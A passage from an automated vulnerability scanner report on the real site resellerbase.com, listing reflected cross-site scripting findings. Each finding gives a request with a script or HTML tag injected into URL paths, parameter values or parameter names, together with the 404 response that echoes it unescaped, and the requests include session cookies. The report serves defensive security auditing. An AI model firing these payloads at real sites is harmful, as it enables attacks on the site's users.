HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php7cadb<script>alert(1)</script>f88c04ec8be?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1637. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 538c6<a>8d5807a7317 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search538c6<a>8d5807a7317&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search538c6<a>8d5807a7317&opt=2 was not found on this server.</p>
...[SNIP]...

2.1638. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 710fc<a>8f168b8c7b0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...710fc<a>8f168b8c7b0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...710fc<a>8f168b8c7b0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1639. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e166<script>alert(1)</script>b40eff45d96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&6e166<script>alert(1)</script>b40eff45d96=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&6e166<script>alert(1)</script>b40eff45d96=1 was not found on this server.</p>
...[SNIP]...

2.1640. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6a6ff<a>0e9f9010ac0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26a6ff<a>0e9f9010ac0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26a6ff<a>0e9f9010ac0 was not found on this server.</p>
...[SNIP]...

2.1641. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2bce<script>alert(1)</script>0ae02274197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila2bce<script>alert(1)</script>0ae02274197/19/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila2bce<script>alert(1)</script>0ae02274197/19/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1642. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8c37<script>alert(1)</script>d6fe047e7af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19f8c37<script>alert(1)</script>d6fe047e7af/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19f8c37<script>alert(1)</script>d6fe047e7af/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1643. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 511f2<script>alert(1)</script>30938866de4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes511f2<script>alert(1)</script>30938866de4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes511f2<script>alert(1)</script>30938866de4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1644. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 404d9<script>alert(1)</script>7bac3e1b76a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/search.php404d9<script>alert(1)</script>7bac3e1b76a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php404d9<script>alert(1)</script>7bac3e1b76a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1645. http://www.resellerbase.com/detail/19/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 541e7<a>ad12edb281 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search541e7<a>ad12edb281&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...&Submit3=Search541e7<a>ad12edb281&opt=2 was not found on this server.</p>
...[SNIP]...

2.1646. http://www.resellerbase.com/detail/19/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 749f1<a>cbe8871a4fa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/search.php?keyword=search...749f1<a>cbe8871a4fa&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...749f1<a>cbe8871a4fa&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1647. http://www.resellerbase.com/detail/19/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dfb70<script>alert(1)</script>026ddcd99d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2&dfb70<script>alert(1)</script>026ddcd99d1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2&dfb70<script>alert(1)</script>026ddcd99d1=1 was not found on this server.</p>
...[SNIP]...

2.1648. http://www.resellerbase.com/detail/19/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f0cdf<a>596b3ad7d52 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2f0cdf<a>596b3ad7d52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2f0cdf<a>596b3ad7d52 was not found on this server.</p>
...[SNIP]...

2.1649. http://www.resellerbase.com/detail/20/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80a03<script>alert(1)</script>ffd9514a7e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail80a03<script>alert(1)</script>ffd9514a7e1/20/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail80a03<script>alert(1)</script>ffd9514a7e1/20/ was not found on this server.</p>
...[SNIP]...

2.1650. http://www.resellerbase.com/detail/20/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11eb5<script>alert(1)</script>a0e53ff4be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2011eb5<script>alert(1)</script>a0e53ff4be7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2011eb5<script>alert(1)</script>a0e53ff4be7/ was not found on this server.</p>
...[SNIP]...

2.1651. http://www.resellerbase.com/detail/20/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bdd24<script>alert(1)</script>d0b9e155429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/?bdd24<script>alert(1)</script>d0b9e155429=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/?bdd24<script>alert(1)</script>d0b9e155429=1 was not found on this server.</p>
...[SNIP]...

2.1652. http://www.resellerbase.com/detail/20/ian-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/ian-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2b5c<script>alert(1)</script>4491a80e448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila2b5c<script>alert(1)</script>4491a80e448/20/ian-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila2b5c<script>alert(1)</script>4491a80e448/20/ian-com.html was not found on this server.</p>
...[SNIP]...

2.1653. http://www.resellerbase.com/detail/20/ian-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/ian-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25889<a>e471b2e7457 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/2025889<a>e471b2e7457/ian-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2025889<a>e471b2e7457/ian-com.html was not found on this server.</p>
...[SNIP]...

2.1654. http://www.resellerbase.com/detail/20/ian-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/ian-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3f9d9<script>alert(1)</script>92818c4536 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/3f9d9<script>alert(1)</script>92818c4536 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/3f9d9<script>alert(1)</script>92818c4536 was not found on this server.</p>
...[SNIP]...

2.1655. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 133ac<script>alert(1)</script>36a2c5b4540 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail133ac<script>alert(1)</script>36a2c5b4540/20/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
